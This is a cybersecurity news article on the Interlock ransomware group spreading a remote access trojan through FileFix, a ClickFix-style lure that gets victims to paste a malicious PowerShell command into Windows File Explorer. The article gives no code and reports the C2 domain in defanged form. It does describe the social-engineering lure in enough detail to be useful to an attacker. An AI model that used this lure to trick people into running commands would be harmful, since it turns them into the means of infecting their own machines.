Redazione RHC : 16 July 2025 08:19
The Interlock ransomware hacker group is distributing a remote access trojan (RAT) through compromised websites. Hackers use FileFix attacks to spread the malware. ClickFix attacks rely on social engineering. Several variations of these attacks have become common recently. Typically, victims are lured to fraudulent websites and tricked into copying and running malicious PowerShell commands. In other words, they manually infect their systems with malware.
Attackers explain the need to run certain commands by fixing content display issues in the browser or asking the user to solve a fake CAPTCHA. Although ClickFix attacks most often target Windows users who are tricked into running PowerShell commands, security researchers have already reported campaigns targeting macOS and Linux users as well.
According to ESET, the use of ClickFix as an initial access vector increased by 517% between the second half of 2024 and the first half of 2025. The FileFix technique, recently described by security expert mr.d0x, is a variant of the ClickFix attack, but uses the more familiar Windows File Explorer interface instead of the File Explorer command line. command.
Therefore, on the malicious page, the user is informed that they have been granted general access to a specific file. To find this file, the path would have to be copied and pasted into Explorer. “The phishing page may contain an ‘Open File Explorer’ button, which, when clicked, will launch File Explorer (using the file upload feature) and copy the PowerShell command to the clipboard,” mr.d0x explained. This means that after entering the file path and pressing Enter, the malicious PowerShell command will be executed.
As early as early May 2025, the DFIR Report and Proofpoint reported that the Interlock RAT was being distributed via KongTuke (or LandUpdate808), a sophisticated traffic delivery system (TDS) that delivered malware via a multi-stage process involving ClickFix and fake CAPTCHAs. As now known, hackers switched to FileFix in early June and began distributing the PHP variant of the Interlock RAT. DFIR report specialists note that in some cases, the Node.js variant of the malware is also being distributed.
Once executed, the RAT gathers system information using PowerShell commands to collect and transmit data to its operators. The malware also verifies the privileges of the logged-in user. The RAT connects to the system and awaits the execution of further commands. At the same time, the expert report notes that the attackers are clearly operating the malware manually, checking backups, navigating local directories, and controlling domain controllers. Researchers note that in some cases, attackers used RDP to move laterally in compromised environments.
The malware uses trycloudflare[.]com as a command-and-control server, abusing the legitimate Cloudflare Tunnel service to hide its activity. The DFIR representative believes this campaign is opportunistic.
Redazione